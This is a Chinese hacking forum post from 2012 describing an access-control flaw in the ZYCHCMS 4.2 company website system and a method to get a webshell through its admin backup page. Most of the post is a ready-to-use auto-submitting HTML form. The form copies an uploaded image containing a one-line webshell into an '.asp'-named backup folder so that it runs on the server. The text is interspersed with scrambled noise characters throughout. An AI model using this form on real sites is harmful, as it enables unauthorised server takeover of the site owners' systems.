找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1888|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
) e, f( L- r' P- g9 u% W
' {  R# B/ A6 Q; }
. _0 p( K) F1 ]) t- t: S

) }4 l! Z) z2 \( g* o5 q2 _1 c0 j3 g影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
. B0 A7 Q/ ]) {1 Y+ D ①SQL注射漏洞/ S1 e: p2 `' u" N/ h
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp! X* a/ {, a$ L9 U6 a5 G& c# D
漏洞原因:未过滤
, ^( F2 G0 L& P* Y1 T/ | 漏洞代码:0 b  g3 w0 Z  q$ B1 f1 y$ q# N
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
1 Z. ]# x( p2 @0 R2 Q0 s 修复方法:在文件开头加入代码# l6 T" f4 j# \- {
! L+ ?3 b+ h  s* x( s
2 U( D$ D4 `; C" t) W
②后台拿WBSHELL% w  C& A# j/ [. |8 [
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。9 s& M( Q7 Y( @5 b+ \# e
这里在网上找了一个,改了下,将就着用。
* M6 V7 M9 M/ {9 k* Q9 G 以下是代码本地提交代码7 n  z! T: T2 I0 @: D7 k- G/ R4 l1 w
# ?4 O% K6 t3 M5 ?' g! j/ [

. i" G7 j* }  ~5 ]; E# K6 a% E8 x6 ?<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
2 ^1 p0 Y0 `; R/ C3 X! Y9 a* P8 J <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>+ D' H! [3 Y. ^* s
<tr>' G4 i' j( c  l+ [2 _) G
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>7 _- N3 K% y% _) O
</tr>$ ]' h5 ]5 d& W9 |0 U
<tr>
% r( I+ l6 V% o0 m <td bgcolor=”#FFFFFF”><span class=”back_southidc”>- g' s! y6 ?# A* N
</span>
! N/ Q' A8 ~: u9 C <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
# G. u7 {: J3 e8 C <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
5 v, E5 h) K0 j' B+ m( C <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td># r. A4 ^7 i3 c+ o' A2 F
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d% O) f& `2 v" _. H. f
<div align=”left”>- G7 b! k) s* D0 g
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
; @& l% c5 z$ o <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>6 F2 B- K( V2 M6 _2 q6 G9 @% @
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />0 Q. y1 n/ r8 [+ M/ C7 a) q
</div></td>
# g, i, j1 Q- y </tr>2 o3 R0 M$ M+ G$ e$ ~0 U
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>1 @: ?! D8 W) Q/ V
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
' l/ s' h$ o4 O# q <td class=”td”><div align=”left”># J9 q9 \8 j3 i1 u) S% @
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
9 E9 e# D* }$ X( J  W5 h  ? [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
2 x3 O5 v2 X7 m0 S4 Z </tr>
+ K6 x6 h6 y' V, ^ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>! E) k& M$ K2 h# \8 p/ w' w  q
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>% u; v) f" R  F% V: ]
<td class=”td”><div align=”left”>
+ d9 c2 J* _) g) P5 M$ u" ? <input type=”submit” value=”确定备份” class=”btn”
0 P3 Z+ e1 A7 p6 y1 I </div></td>
3 M, f3 t1 x# \( D8 D </tr>4 R" d7 C+ B5 }5 `0 l
</table></td></tr></form>
- K3 ]) {6 H4 I; D  x. `$ T1 r </table>9 i3 S6 Y1 u% s2 j- i7 M- L2 y7 u! @
</td>* Z3 [1 |! n! C- V
</tr>
3 t. n6 ^; r6 A </table>  [# ?, _5 \" M( _* }
<script>
4 `+ B. i6 o  [3 _ document.all.add.submit();
2 s4 l: @0 T, g: A; C5 M2 w- L </script>7 I1 y2 `6 R6 ~# n

0 t/ w8 z6 x' K1 g
7 U8 v+ ~" O8 A9 x
% \7 |  s; T3 T! t6 w1 B
* ^6 l3 g; B9 K$ i  H- ]- d
. D1 w& `. @" I3 i7 `# e2 p- m6 B+ T4 ]) E7 j, b

# U/ @  ?, W# u& \( R: N) p& b9 }$ B; [0 M. U% w5 N+ R

& \* q+ w) L& G4 F9 a/ H' `" T" J+ A- j7 ]* n; ^! \. X6 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表